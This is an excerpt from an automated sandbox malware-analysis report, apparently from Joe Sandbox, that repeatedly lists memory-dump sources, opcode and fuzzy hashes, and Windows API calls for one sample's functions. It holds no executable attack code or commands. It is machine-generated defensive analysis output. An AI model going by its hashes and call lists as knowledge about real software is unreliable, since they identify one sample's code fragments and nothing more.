                                                                    • Instruction Fuzzy Hash: 2B62D6716047859FCB29CF38C4906B9BBE1AF96304F18856DDCDA8B342DB34E945EB20
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e008b3fe25645c420bb524d8f5ec445355e06715b0fa383b64c6e5b3b3f0fe45
                                                                    • Instruction ID: 3102438181926035a84551595944e4ff91be3c69fa2ffe19e5c9f21fee66f759
                                                                    • Opcode Fuzzy Hash: e008b3fe25645c420bb524d8f5ec445355e06715b0fa383b64c6e5b3b3f0fe45
                                                                    • Instruction Fuzzy Hash: FF62F6716082459FCB18CF28C4A06A9FBE1BF96304F08866DEC9A8B346D734E945DB75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7b613aa6936206879556b4b98a40ab473639d5810861dad884f2e1ee316ea20b
                                                                    • Instruction ID: 661c5611a23e5648fef51986fe527eaf3d730a20f79dd06cdc574ac55b322b7c
                                                                    • Opcode Fuzzy Hash: 7b613aa6936206879556b4b98a40ab473639d5810861dad884f2e1ee316ea20b
                                                                    • Instruction Fuzzy Hash: C7525B72A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D734EA19CB86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a69292c45b223b740268951c649d8b9acd8f55ca80f8366a3053486a4040693f
                                                                    • Instruction ID: 04e24d1d1b08e044f2de8f2fa48a21e3e211a3bc38c5858adafb7a45fa13267e
                                                                    • Opcode Fuzzy Hash: a69292c45b223b740268951c649d8b9acd8f55ca80f8366a3053486a4040693f
                                                                    • Instruction Fuzzy Hash: BE12C0716147069FCB28CF28C4A17B9F3E0EB46304F14892EE99AC7680D778E995CB55
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ba685a4ff9ba19ba45c6a97c069957b4dd82cffd58785d59cf1094110cb4812
                                                                    • Instruction ID: d39123814a60901c144520281f0c0e796b85bd979fec625788df0ff5f3fb7eea
                                                                    • Opcode Fuzzy Hash: 7ba685a4ff9ba19ba45c6a97c069957b4dd82cffd58785d59cf1094110cb4812
                                                                    • Instruction Fuzzy Hash: 5EF18871A083518FCB18CF68C58462ABBE5FFD9704F184A2EE4C6D7251D731E909CBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 640949c7b723db3b69751cb444723788b12cdb10fd47e04b90b5380df3ec6d4d
                                                                    • Instruction ID: 2426c2ae380f5d9f7d0a11bf3a17d6a7a9c02d03e115f17c6eb5afac55c924ed
                                                                    • Opcode Fuzzy Hash: 640949c7b723db3b69751cb444723788b12cdb10fd47e04b90b5380df3ec6d4d
                                                                    • Instruction Fuzzy Hash: E7E158755193918FC304CF29D49046BBBF0BB99300F4A495EF9D497352E235EA19CFA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 96fd374033ef4530b344335ce06b0e8dbede25dace8267e88c4779051d6c121f
                                                                    • Instruction ID: 1c7582e013443bcadb685c353ac01acd4f4cca6329acf2c1304e1d626eb79c30
                                                                    • Opcode Fuzzy Hash: 96fd374033ef4530b344335ce06b0e8dbede25dace8267e88c4779051d6c121f
                                                                    • Instruction Fuzzy Hash: 8E9163B1204348DBDB24EF78D891BFA77D4EBA6300F18082EE59787282EA74D505C771
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5eb780a21d6e51035662a41d13efca83e899c95e5191285f4b9780a18002e0fa
                                                                    • Instruction ID: 1b18bfe8262034fbf979c353add550b2d37e222b72c5f06c5de9381e9223d28a
                                                                    • Opcode Fuzzy Hash: 5eb780a21d6e51035662a41d13efca83e899c95e5191285f4b9780a18002e0fa
                                                                    • Instruction Fuzzy Hash: 6B813C71708341DBDB24DF28C891BBD77D5DBA6704F1C493EE9868B286DAB4C88487B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 715940cba0660c19886b1e3f3147e416a4f16fe9c574c02fba393d6d62a1498e
                                                                    • Instruction ID: 8a07fd26a69e024d5d2cba32e5776d4894a7bd5a1b114b142d5d6f5e01302194
                                                                    • Opcode Fuzzy Hash: 715940cba0660c19886b1e3f3147e416a4f16fe9c574c02fba393d6d62a1498e
                                                                    • Instruction Fuzzy Hash: 35614A7164C709E7DE785A388865BFE6398EBC1700F1C091AE887DB281DA11DE41DB79
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                    • Instruction ID: 9aec7f8d6a81a002cc303caaf583d5f584a3840b11002ef3fa415b5bf9a3e7bc
                                                                    • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                    • Instruction Fuzzy Hash: BF514565A0C745DBDB384968856ABFE2799DBD1300F1C0909E883DB282DE05DD45D7B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc01bc57b24830671f8a9fd5fb37d8c1dfb3cab1dd2f3ea3b83dfcb942fc116e
                                                                    • Instruction ID: 7474dd30bdf00f45ce572a2ec75a613cd7fc22330fb919ccd8bc5980cf7b3203
                                                                    • Opcode Fuzzy Hash: fc01bc57b24830671f8a9fd5fb37d8c1dfb3cab1dd2f3ea3b83dfcb942fc116e
                                                                    • Instruction Fuzzy Hash: 0151C4395083D54FC711DF3885405BEBFE0AFAB314F4A499AE5D94B242D221D68ACB72
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 84c9e481e66861e601e501c991c738560d9cb5e6b5251f7dfb914c2d61b0577a
                                                                    • Instruction ID: b30fe92fbf4d06ec83b75e75259661cab6707681ae71955c83c0beb7f72fc1bd
                                                                    • Opcode Fuzzy Hash: 84c9e481e66861e601e501c991c738560d9cb5e6b5251f7dfb914c2d61b0577a
                                                                    • Instruction Fuzzy Hash: 6851DFB1A087119FC758CF29D88055AF7E1FF88314F058A2EE899E7340DB31E959CB96
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
                                                                    • Instruction ID: ec3f4c74adf6436366d510158097e8ff07986f29f6b77bc1408820d4de25bf18
                                                                    • Opcode Fuzzy Hash: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
                                                                    • Instruction Fuzzy Hash: 0031E1B1618B168FCB14DF28D85116EBBE0EF9A300F14492EF495C7742C735E909CBA1
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 00DA0284
                                                                      • Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13
                                                                      • Part of subcall function 00DA3F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00D9F801,00000000,00000000,?,00DD5070,?,00D9F801,?,?,00000050,?), ref: 00DA3F64
                                                                    • _strlen.LIBCMT ref: 00DA02A5
                                                                    • SetDlgItemTextW.USER32(?,00DD2274,?), ref: 00DA02FE
                                                                    • GetWindowRect.USER32(?,?), ref: 00DA0334
                                                                    • GetClientRect.USER32(?,?), ref: 00DA0340
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00DA03EB
                                                                    • GetWindowRect.USER32(?,?), ref: 00DA041B
                                                                    • SetWindowTextW.USER32(?,?), ref: 00DA044A
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00DA0452
                                                                    • GetWindow.USER32(?,00000005), ref: 00DA045D
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00DA048D
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00DA04FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                    • String ID: $%s:$CAPTION$d
                                                                    • API String ID: 2407758923-2512411981
                                                                    • Opcode ID: 240fafffcd6ee00bcded39e58b994d59b2d5521640ecf0b29e62b57c459c1006
                                                                    • Instruction ID: 66fdd918168b153ce47a4713b145479f1acc1ee598011a10e5f4447c869a7fb5
                                                                    • Opcode Fuzzy Hash: 240fafffcd6ee00bcded39e58b994d59b2d5521640ecf0b29e62b57c459c1006
                                                                    • Instruction Fuzzy Hash: 33819B72608301AFD714DF68CD89A6FBBE9EB89704F04591DFA85D3290D774E908CB62
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 00DBF1B6
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBED6E
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBED80
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBED92
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDA4
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDB6
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDC8
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDDA
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDEC
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEDFE
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEE10
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEE22
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEE34
                                                                      • Part of subcall function 00DBED51: _free.LIBCMT ref: 00DBEE46
                                                                    • _free.LIBCMT ref: 00DBF1AB
                                                                      • Part of subcall function 00DBBAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?), ref: 00DBBB10
                                                                      • Part of subcall function 00DBBAFA: GetLastError.KERNEL32(?,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?,?), ref: 00DBBB22
                                                                    • _free.LIBCMT ref: 00DBF1CD
                                                                    • _free.LIBCMT ref: 00DBF1E2
                                                                    • _free.LIBCMT ref: 00DBF1ED
                                                                    • _free.LIBCMT ref: 00DBF20F
                                                                    • _free.LIBCMT ref: 00DBF222
                                                                    • _free.LIBCMT ref: 00DBF230
                                                                    • _free.LIBCMT ref: 00DBF23B
                                                                    • _free.LIBCMT ref: 00DBF273
                                                                    • _free.LIBCMT ref: 00DBF27A
                                                                    • _free.LIBCMT ref: 00DBF297
                                                                    • _free.LIBCMT ref: 00DBF2AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: f3915e750eee278e819c06d965ba71c1e7958700fe632242f81b543e4713dded
                                                                    • Instruction ID: 22bbb6c1be53d54a079ac20423cd324784e5b9d6f1c6ec59300a5dd83cba7a83
                                                                    • Opcode Fuzzy Hash: f3915e750eee278e819c06d965ba71c1e7958700fe632242f81b543e4713dded
                                                                    • Instruction Fuzzy Hash: 33310631A00705DFEB21AB69DC45BDA77E9FF01360F28492AE44BD6151DFB1AD40CA34
                                                                    APIs
                                                                    • GetWindow.USER32(?,00000005), ref: 00DAFA20
                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00DAFA4C
                                                                      • Part of subcall function 00DA4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00D9E084,00000000,.exe,?,?,00000800,?,?,?,00DAAD5D), ref: 00DA417E
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00DAFA68
                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00DAFA7F
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00DAFA93
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00DAFABC
                                                                    • DeleteObject.GDI32(00000000), ref: 00DAFAC3
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00DAFACC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                    • String ID: STATIC
                                                                    • API String ID: 3820355801-1882779555
                                                                    • Opcode ID: 4096f3360aeb2abdf2c8046639eca6a23dcb92993736c729ddd8adac7dca84ff
                                                                    • Instruction ID: 3ae97e65bf3bfa65cddb2b873c91dfdae638324f8ec8f020663f35e23fb634de
                                                                    • Opcode Fuzzy Hash: 4096f3360aeb2abdf2c8046639eca6a23dcb92993736c729ddd8adac7dca84ff
                                                                    • Instruction Fuzzy Hash: 3E212236644720BBE220ABB0DC4AFFF77ACEF4A710F044425F945E6291DBB4990686B5
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00DBB8C5
                                                                      • Part of subcall function 00DBBAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?), ref: 00DBBB10
                                                                      • Part of subcall function 00DBBAFA: GetLastError.KERNEL32(?,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?,?), ref: 00DBBB22
                                                                    • _free.LIBCMT ref: 00DBB8D1
                                                                    • _free.LIBCMT ref: 00DBB8DC
                                                                    • _free.LIBCMT ref: 00DBB8E7
                                                                    • _free.LIBCMT ref: 00DBB8F2
                                                                    • _free.LIBCMT ref: 00DBB8FD
                                                                    • _free.LIBCMT ref: 00DBB908
                                                                    • _free.LIBCMT ref: 00DBB913
                                                                    • _free.LIBCMT ref: 00DBB91E
                                                                    • _free.LIBCMT ref: 00DBB92C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
